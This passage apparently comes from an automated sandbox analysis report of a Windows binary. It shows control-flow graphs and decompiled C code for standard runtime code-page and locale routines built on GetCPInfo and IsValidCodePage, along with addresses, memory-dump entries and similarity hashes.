                                                                                                                                                                                                                                                                      control_flow_graph 119 118b225-118b259 GetCPInfo 120 118b34f-118b35c 119->120 121 118b25f 119->121 123 118b362-118b372 120->123 122 118b261-118b26b 121->122 122->122 124 118b26d-118b280 122->124 125 118b37e-118b385 123->125 126 118b374-118b37c 123->126 127 118b2a1-118b2a3 124->127 129 118b395 125->129 130 118b387-118b38e 125->130 128 118b391-118b393 126->128 132 118b282-118b289 127->132 133 118b2a5-118b2dc call 118a4fd call 118caa6 127->133 131 118b397-118b3a6 128->131 129->131 130->128 131->123 134 118b3a8-118b3b8 call 118dc5f 131->134 135 118b298-118b29a 132->135 144 118b2e1-118b30c call 118caa6 133->144 138 118b28b-118b28d 135->138 139 118b29c-118b29f 135->139 138->139 142 118b28f-118b297 138->142 139->127 142->135 147 118b30e-118b318 144->147 148 118b328-118b32a 147->148 149 118b31a-118b326 147->149 151 118b32c-118b331 148->151 152 118b341 148->152 150 118b338-118b33f 149->150 153 118b348-118b34b 150->153 151->150 152->153 153->147 154 118b34d 153->154 154->134
                                                                                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                                                                                      			E0118B225(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				char _v264;
                                                                                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                                                                                      				char _v776;
                                                                                                                                                                                                                                                                      				char _v1800;
                                                                                                                                                                                                                                                                      				char _v1814;
                                                                                                                                                                                                                                                                      				struct _cpinfo _v1820;
                                                                                                                                                                                                                                                                      				intOrPtr _v1824;
                                                                                                                                                                                                                                                                      				signed int _v1828;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                                                                                      				signed int _t68;
                                                                                                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                                                                                                      				void* _t72;
                                                                                                                                                                                                                                                                      				char _t73;
                                                                                                                                                                                                                                                                      				char _t74;
                                                                                                                                                                                                                                                                      				signed char _t75;
                                                                                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                                                                                      				signed char _t86;
                                                                                                                                                                                                                                                                      				char _t87;
                                                                                                                                                                                                                                                                      				char _t90;
                                                                                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                                                                                      				signed int _t95;
                                                                                                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                                                                                                      				char* _t97;
                                                                                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                                                                                      				signed int _t102;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t95 = __edx;
                                                                                                                                                                                                                                                                      				_t63 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      				_v8 = _t63 ^ _t102;
                                                                                                                                                                                                                                                                      				_t101 = _a4;
                                                                                                                                                                                                                                                                      				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                                                                                                                                                                                                                                                      					_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                      					_t90 = 0;
                                                                                                                                                                                                                                                                      					_t67 = 0xffffff9f;
                                                                                                                                                                                                                                                                      					_t68 = _t67 - _t96;
                                                                                                                                                                                                                                                                      					__eflags = _t68;
                                                                                                                                                                                                                                                                      					_v1828 = _t68;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t97 = _t96 + _t90;
                                                                                                                                                                                                                                                                      						_t69 = _t68 + _t97;
                                                                                                                                                                                                                                                                      						_v1824 = _t69;
                                                                                                                                                                                                                                                                      						__eflags = _t69 + 0x20 - 0x19;
                                                                                                                                                                                                                                                                      						if(_t69 + 0x20 > 0x19) {
                                                                                                                                                                                                                                                                      							__eflags = _v1824 - 0x19;
                                                                                                                                                                                                                                                                      							if(_v1824 > 0x19) {
                                                                                                                                                                                                                                                                      								 *_t97 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t72 = _t101 + _t90;
                                                                                                                                                                                                                                                                      								_t57 = _t72 + 0x19;
                                                                                                                                                                                                                                                                      								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                      								__eflags =  *_t57;
                                                                                                                                                                                                                                                                      								_t59 = _t90 - 0x20; // -32
                                                                                                                                                                                                                                                                      								_t73 = _t59;
                                                                                                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                      							_t54 = _t90 + 0x20; // 0x20
                                                                                                                                                                                                                                                                      							_t73 = _t54;
                                                                                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                                                                                      							 *_t97 = _t73;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t68 = _v1828;
                                                                                                                                                                                                                                                                      						_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                      						_t90 = _t90 + 1;
                                                                                                                                                                                                                                                                      						__eflags = _t90 - 0x100;
                                                                                                                                                                                                                                                                      					} while (_t90 < 0x100);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t74 = 0;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                                                                                                                                                                                                                                                      						_t74 = _t74 + 1;
                                                                                                                                                                                                                                                                      					} while (_t74 < 0x100);
                                                                                                                                                                                                                                                                      					_t75 = _v1814;
                                                                                                                                                                                                                                                                      					_t93 =  &_v1814;
                                                                                                                                                                                                                                                                      					_v264 = 0x20;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t108 = _t75;
                                                                                                                                                                                                                                                                      						if(_t75 == 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                      						_t76 = _t75 & 0x000000ff;
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							__eflags = _t76 - _t95;
                                                                                                                                                                                                                                                                      							if(_t76 > _t95) {
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t76 - 0x100;
                                                                                                                                                                                                                                                                      							if(_t76 < 0x100) {
                                                                                                                                                                                                                                                                      								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                                                                                                                                                                                                                                                      								_t76 = _t76 + 1;
                                                                                                                                                                                                                                                                      								__eflags = _t76;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t93 = _t93 + 2;
                                                                                                                                                                                                                                                                      						__eflags = _t93;
                                                                                                                                                                                                                                                                      						_t75 =  *_t93;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					E0118A4FD(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                      					E0118CAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
                                                                                                                                                                                                                                                                      					E0118CAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                      					_t94 = 0;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                                                                                                                                                                                                                                      						if((_t86 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                      							__eflags = _t86 & 0x00000002;
                                                                                                                                                                                                                                                                      							if((_t86 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                      								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t37 = _t101 + _t94 + 0x19;
                                                                                                                                                                                                                                                                      								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                      								__eflags =  *_t37;
                                                                                                                                                                                                                                                                      								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                                                                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                                                                                                                                                                                                                                                      							L15:
                                                                                                                                                                                                                                                                      							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                      					} while (_t94 < 0x100);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return E0118DC5F(_v8 ^ _t102);
                                                                                                                                                                                                                                                                      			}































                                                                                                                                                                                                                                                                      0x0118b225
                                                                                                                                                                                                                                                                      0x0118b230
                                                                                                                                                                                                                                                                      0x0118b237
                                                                                                                                                                                                                                                                      0x0118b23c
                                                                                                                                                                                                                                                                      0x0118b259
                                                                                                                                                                                                                                                                      0x0118b351
                                                                                                                                                                                                                                                                      0x0118b357
                                                                                                                                                                                                                                                                      0x0118b359
                                                                                                                                                                                                                                                                      0x0118b35a
                                                                                                                                                                                                                                                                      0x0118b35a
                                                                                                                                                                                                                                                                      0x0118b35c
                                                                                                                                                                                                                                                                      0x0118b362
                                                                                                                                                                                                                                                                      0x0118b362
                                                                                                                                                                                                                                                                      0x0118b364
                                                                                                                                                                                                                                                                      0x0118b366
                                                                                                                                                                                                                                                                      0x0118b36f
                                                                                                                                                                                                                                                                      0x0118b372
                                                                                                                                                                                                                                                                      0x0118b37e
                                                                                                                                                                                                                                                                      0x0118b385
                                                                                                                                                                                                                                                                      0x0118b395
                                                                                                                                                                                                                                                                      0x0118b387
                                                                                                                                                                                                                                                                      0x0118b387
                                                                                                                                                                                                                                                                      0x0118b38a
                                                                                                                                                                                                                                                                      0x0118b38a
                                                                                                                                                                                                                                                                      0x0118b38a
                                                                                                                                                                                                                                                                      0x0118b38e
                                                                                                                                                                                                                                                                      0x0118b38e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b38e
                                                                                                                                                                                                                                                                      0x0118b374
                                                                                                                                                                                                                                                                      0x0118b374
                                                                                                                                                                                                                                                                      0x0118b379
                                                                                                                                                                                                                                                                      0x0118b379
                                                                                                                                                                                                                                                                      0x0118b391
                                                                                                                                                                                                                                                                      0x0118b391
                                                                                                                                                                                                                                                                      0x0118b391
                                                                                                                                                                                                                                                                      0x0118b397
                                                                                                                                                                                                                                                                      0x0118b39d
                                                                                                                                                                                                                                                                      0x0118b3a3
                                                                                                                                                                                                                                                                      0x0118b3a4
                                                                                                                                                                                                                                                                      0x0118b3a4
                                                                                                                                                                                                                                                                      0x0118b25f
                                                                                                                                                                                                                                                                      0x0118b25f
                                                                                                                                                                                                                                                                      0x0118b261
                                                                                                                                                                                                                                                                      0x0118b261
                                                                                                                                                                                                                                                                      0x0118b268
                                                                                                                                                                                                                                                                      0x0118b269
                                                                                                                                                                                                                                                                      0x0118b26d
                                                                                                                                                                                                                                                                      0x0118b273
                                                                                                                                                                                                                                                                      0x0118b279
                                                                                                                                                                                                                                                                      0x0118b2a1
                                                                                                                                                                                                                                                                      0x0118b2a1
                                                                                                                                                                                                                                                                      0x0118b2a3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b282
                                                                                                                                                                                                                                                                      0x0118b286
                                                                                                                                                                                                                                                                      0x0118b298
                                                                                                                                                                                                                                                                      0x0118b298
                                                                                                                                                                                                                                                                      0x0118b29a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b28b
                                                                                                                                                                                                                                                                      0x0118b28d
                                                                                                                                                                                                                                                                      0x0118b28f
                                                                                                                                                                                                                                                                      0x0118b297
                                                                                                                                                                                                                                                                      0x0118b297
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b297
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b28d
                                                                                                                                                                                                                                                                      0x0118b29c
                                                                                                                                                                                                                                                                      0x0118b29c
                                                                                                                                                                                                                                                                      0x0118b29f
                                                                                                                                                                                                                                                                      0x0118b29f
                                                                                                                                                                                                                                                                      0x0118b2bb
                                                                                                                                                                                                                                                                      0x0118b2dc
                                                                                                                                                                                                                                                                      0x0118b304
                                                                                                                                                                                                                                                                      0x0118b30c
                                                                                                                                                                                                                                                                      0x0118b30e
                                                                                                                                                                                                                                                                      0x0118b30e
                                                                                                                                                                                                                                                                      0x0118b318
                                                                                                                                                                                                                                                                      0x0118b328
                                                                                                                                                                                                                                                                      0x0118b32a
                                                                                                                                                                                                                                                                      0x0118b341
                                                                                                                                                                                                                                                                      0x0118b32c
                                                                                                                                                                                                                                                                      0x0118b32c
                                                                                                                                                                                                                                                                      0x0118b32c
                                                                                                                                                                                                                                                                      0x0118b32c
                                                                                                                                                                                                                                                                      0x0118b331
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b331
                                                                                                                                                                                                                                                                      0x0118b31a
                                                                                                                                                                                                                                                                      0x0118b31a
                                                                                                                                                                                                                                                                      0x0118b31f
                                                                                                                                                                                                                                                                      0x0118b338
                                                                                                                                                                                                                                                                      0x0118b338
                                                                                                                                                                                                                                                                      0x0118b338
                                                                                                                                                                                                                                                                      0x0118b348
                                                                                                                                                                                                                                                                      0x0118b349
                                                                                                                                                                                                                                                                      0x0118b34d
                                                                                                                                                                                                                                                                      0x0118b3b8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                                      • Opcode ID: 152c5caddca3707a7a5e37a3f60da4c52bc9bc0658bfab2273c7618749ea0e99
                                                                                                                                                                                                                                                                      • Instruction ID: 1c5fe1f894f9f70ff7dcaf2da3af8b2ad8151cd5a3dbaebbcc961b366d0d25bf
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 152c5caddca3707a7a5e37a3f60da4c52bc9bc0658bfab2273c7618749ea0e99
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC413D7050C34C9ADB2A9E58CC84BFABBAEEF55308F1444ECD99A87142D335A945CF25
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 155 118b57a-118b59e call 118b14d 158 118b5ae-118b5b5 155->158 159 118b5a0-118b5a9 call 118b1c0 155->159 161 118b5b8-118b5be 158->161 166 118b75b-118b76a call 118dc5f 159->166 163 118b6ae-118b6cd call 118f070 161->163 164 118b5c4-118b5d0 161->164 173 118b6d0-118b6d5 163->173 164->161 167 118b5d2-118b5d8 164->167 170 118b5de-118b5e4 167->170 171 118b6a6-118b6a9 167->171 170->171 175 118b5ea-118b5f6 IsValidCodePage 170->175 172 118b75a 171->172 172->166 176 118b70c-118b716 173->176 177 118b6d7-118b6dc 173->177 175->171 178 118b5fc-118b609 GetCPInfo 175->178 176->173 183 118b718-118b73f call 118b10f 176->183 179 118b709 177->179 180 118b6de-118b6e4 177->180 181 118b60f-118b630 call 118f070 178->181 182 118b693-118b699 178->182 179->176 185 118b6fd-118b6ff 180->185 193 118b632-118b639 181->193 194 118b683 181->194 182->171 187 118b69b-118b6a1 call 118b1c0 182->187 196 118b740-118b74f 183->196 191 118b701-118b707 185->191 192 118b6e6-118b6ec 185->192 200 118b757-118b758 187->200 191->177 191->179 192->191 197 118b6ee-118b6f9 192->197 198 118b63b-118b640 193->198 199 118b65c-118b65f 193->199 202 118b686-118b68e 194->202 196->196 201 118b751-118b752 call 118b225 196->201 197->185 198->199 203 118b642-118b648 198->203 205 118b664-118b66b 199->205 200->172 201->200 202->201 206 118b650-118b652 203->206 205->205 207 118b66d-118b681 call 118b10f 205->207 208 118b64a-118b64f 206->208 209 118b654-118b65a 206->209 207->202 208->206 209->198 209->199
                                                                                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                                                                                      			E0118B57A(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				char _v22;
                                                                                                                                                                                                                                                                      				struct _cpinfo _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                                                                                      				int _t51;
                                                                                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                                                                                      				short _t58;
                                                                                                                                                                                                                                                                      				signed char _t62;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				signed char* _t72;
                                                                                                                                                                                                                                                                      				signed char* _t73;
                                                                                                                                                                                                                                                                      				int _t78;
                                                                                                                                                                                                                                                                      				signed int _t81;
                                                                                                                                                                                                                                                                      				signed char* _t82;
                                                                                                                                                                                                                                                                      				short* _t83;
                                                                                                                                                                                                                                                                      				int _t87;
                                                                                                                                                                                                                                                                      				signed char _t88;
                                                                                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                                                                                      				signed int _t91;
                                                                                                                                                                                                                                                                      				signed int _t92;
                                                                                                                                                                                                                                                                      				int _t94;
                                                                                                                                                                                                                                                                      				int _t95;
                                                                                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t48 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      				_v8 = _t48 ^ _t99;
                                                                                                                                                                                                                                                                      				_t98 = _a8;
                                                                                                                                                                                                                                                                      				_t78 = E0118B14D(__eflags, _a4);
                                                                                                                                                                                                                                                                      				if(_t78 != 0) {
                                                                                                                                                                                                                                                                      					_t94 = 0;
                                                                                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                                                                                      					_t81 = 0;
                                                                                                                                                                                                                                                                      					_t51 = 0;
                                                                                                                                                                                                                                                                      					_v32 = 0;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t51 + 0x121d7e8)) - _t78;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t51 + 0x121d7e8)) == _t78) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                      						_t51 = _t51 + 0x30;
                                                                                                                                                                                                                                                                      						_v32 = _t81;
                                                                                                                                                                                                                                                                      						__eflags = _t51 - 0xf0;
                                                                                                                                                                                                                                                                      						if(_t51 < 0xf0) {
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							__eflags = _t78 - 0xfde8;
                                                                                                                                                                                                                                                                      							if(_t78 == 0xfde8) {
                                                                                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								__eflags = _t78 - 0xfde9;
                                                                                                                                                                                                                                                                      								if(_t78 == 0xfde9) {
                                                                                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                                                                                                                                                                                                                                      									__eflags = _t51;
                                                                                                                                                                                                                                                                      									if(_t51 == 0) {
                                                                                                                                                                                                                                                                      										goto L23;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_t51 = GetCPInfo(_t78,  &_v28);
                                                                                                                                                                                                                                                                      										__eflags = _t51;
                                                                                                                                                                                                                                                                      										if(_t51 == 0) {
                                                                                                                                                                                                                                                                      											__eflags =  *0x121e17c - _t94; // 0x0
                                                                                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                                                                                      												goto L23;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												E0118B1C0(_t98);
                                                                                                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											E0118F070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                      											 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                      											 *(_t98 + 0x21c) = _t94;
                                                                                                                                                                                                                                                                      											_t78 = 1;
                                                                                                                                                                                                                                                                      											__eflags = _v28 - 1;
                                                                                                                                                                                                                                                                      											if(_v28 <= 1) {
                                                                                                                                                                                                                                                                      												 *(_t98 + 8) = _t94;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												__eflags = _v22;
                                                                                                                                                                                                                                                                      												_t72 =  &_v22;
                                                                                                                                                                                                                                                                      												if(_v22 != 0) {
                                                                                                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                                                                                                      														_t88 = _t72[1];
                                                                                                                                                                                                                                                                      														__eflags = _t88;
                                                                                                                                                                                                                                                                      														if(_t88 == 0) {
                                                                                                                                                                                                                                                                      															goto L16;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														_t91 = _t88 & 0x000000ff;
                                                                                                                                                                                                                                                                      														_t89 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                                                                                      															__eflags = _t89 - _t91;
                                                                                                                                                                                                                                                                      															if(_t89 > _t91) {
                                                                                                                                                                                                                                                                      																break;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                                                                                                                                                                                                                                                      															_t89 = _t89 + 1;
                                                                                                                                                                                                                                                                      															__eflags = _t89;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														_t72 =  &(_t72[2]);
                                                                                                                                                                                                                                                                      														__eflags =  *_t72;
                                                                                                                                                                                                                                                                      														if( *_t72 != 0) {
                                                                                                                                                                                                                                                                      															continue;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														goto L16;
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												L16:
                                                                                                                                                                                                                                                                      												_t73 = _t98 + 0x1a;
                                                                                                                                                                                                                                                                      												_t87 = 0xfe;
                                                                                                                                                                                                                                                                      												do {
                                                                                                                                                                                                                                                                      													 *_t73 =  *_t73 | 0x00000008;
                                                                                                                                                                                                                                                                      													_t73 =  &(_t73[1]);
                                                                                                                                                                                                                                                                      													_t87 = _t87 - 1;
                                                                                                                                                                                                                                                                      													__eflags = _t87;
                                                                                                                                                                                                                                                                      												} while (_t87 != 0);
                                                                                                                                                                                                                                                                      												 *(_t98 + 0x21c) = E0118B10F( *(_t98 + 4));
                                                                                                                                                                                                                                                                      												 *(_t98 + 8) = _t78;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_t95 = _t98 + 0xc;
                                                                                                                                                                                                                                                                      											asm("stosd");
                                                                                                                                                                                                                                                                      											asm("stosd");
                                                                                                                                                                                                                                                                      											asm("stosd");
                                                                                                                                                                                                                                                                      											L36:
                                                                                                                                                                                                                                                                      											E0118B225(_t78, _t91, _t95, _t98, _t98); // executed
                                                                                                                                                                                                                                                                      											L37:
                                                                                                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					E0118F070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                      					_t54 = _v32 * 0x30;
                                                                                                                                                                                                                                                                      					__eflags = _t54;
                                                                                                                                                                                                                                                                      					_v36 = _t54;
                                                                                                                                                                                                                                                                      					_t55 = _t54 + 0x121d7f8;
                                                                                                                                                                                                                                                                      					_v32 = _t55;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						__eflags =  *_t55;
                                                                                                                                                                                                                                                                      						_t82 = _t55;
                                                                                                                                                                                                                                                                      						if( *_t55 != 0) {
                                                                                                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                                                                                                      								_t62 = _t82[1];
                                                                                                                                                                                                                                                                      								__eflags = _t62;
                                                                                                                                                                                                                                                                      								if(_t62 == 0) {
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t92 =  *_t82 & 0x000000ff;
                                                                                                                                                                                                                                                                      								_t63 = _t62 & 0x000000ff;
                                                                                                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                                                                                                      									__eflags = _t92 - _t63;
                                                                                                                                                                                                                                                                      									if(_t92 > _t63) {
                                                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									__eflags = _t92 - 0x100;
                                                                                                                                                                                                                                                                      									if(_t92 < 0x100) {
                                                                                                                                                                                                                                                                      										_t31 = _t94 + 0x121d7e4; // 0x8040201
                                                                                                                                                                                                                                                                      										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                                                                                                                                                                                                                                                      										_t92 = _t92 + 1;
                                                                                                                                                                                                                                                                      										__eflags = _t92;
                                                                                                                                                                                                                                                                      										_t63 = _t82[1] & 0x000000ff;
                                                                                                                                                                                                                                                                      										continue;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t82 =  &(_t82[2]);
                                                                                                                                                                                                                                                                      								__eflags =  *_t82;
                                                                                                                                                                                                                                                                      								if( *_t82 != 0) {
                                                                                                                                                                                                                                                                      									continue;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t55 = _v32;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                      						_t55 = _t55 + 8;
                                                                                                                                                                                                                                                                      						_v32 = _t55;
                                                                                                                                                                                                                                                                      						__eflags = _t94 - 4;
                                                                                                                                                                                                                                                                      					} while (_t94 < 4);
                                                                                                                                                                                                                                                                      					 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                      					 *(_t98 + 8) = 1;
                                                                                                                                                                                                                                                                      					 *(_t98 + 0x21c) = E0118B10F(_t78);
                                                                                                                                                                                                                                                                      					_t83 = _t98 + 0xc;
                                                                                                                                                                                                                                                                      					_t91 = _v36 + 0x121d7ec;
                                                                                                                                                                                                                                                                      					_t95 = 6;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t58 =  *_t91;
                                                                                                                                                                                                                                                                      						_t91 = _t91 + 2;
                                                                                                                                                                                                                                                                      						 *_t83 = _t58;
